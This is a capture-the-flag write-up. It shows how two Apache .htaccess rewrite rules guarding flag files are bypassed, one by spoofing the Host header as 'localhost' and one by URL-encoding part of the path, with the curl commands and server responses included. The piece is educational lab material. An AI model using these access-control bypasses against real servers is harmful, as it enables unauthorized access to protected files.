Tags: web htaccess apache
Rating: 5.0
The site tells us that there are .htaccess files that configure the permissions for /one/flag.txt and /two/flag.txt.
The .htaccess file for /one/flag.txt looks like this:
```
RewriteEngine On
RewriteCond %{HTTP_HOST} !^localhost$
RewriteRule ".*" "-" [F]
```
That tells us if the Host header does not match the string 'localhost' the request is rewritten to be forbidden. Luckily we can simply set the Host header in our request to a value of our choice. Why not use 'localhost' then:
```bash
$curl -i -s -k -X $'GET' -H $'Host: localhost' $'http://34.87.217.252:30026/one/flag.txt'
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2022 04:20:69 GMT
Server: Apache/2.4.54 (Unix)
Last-Modified: Tue, 20 Sep 2022 12:48:21 GMT
ETag: "f-5e91b3e3b0f40"
Accept-Ranges: bytes
Content-Length: 15
Content-Type: text/plain
DUCTF{thats_it_
```
First part of the flag down. Let's examine the second .htaccess file:
```
RewriteEngine On
RewriteCond %{THE_REQUEST} flag
RewriteRule ".*" "-" [F]
```
This has a similar structure but contains a server variable: 'THE_REQUEST'.
Official apache documentation (https://httpd.apache.org/docs/current/mod/mod_rewrite.html) states:
```
THE_REQUEST
The full HTTP request line sent by the browser to the server (e.g., "GET /index.html HTTP/1.1"). This does not include any additional headers sent by the browser. This value has not been unescaped (decoded), unlike most other variables below.
```
This means we are not allowed to request anything that has the string 'flag' in it. Thus we simply replace the 'flag' part of the url by an URL encoded string
```
$curl http://34.87.217.252:30026/two/%66lag.txt
next_time_im_using_nginx}
```
Now we only have to combine the two parts of the flag to receive our points.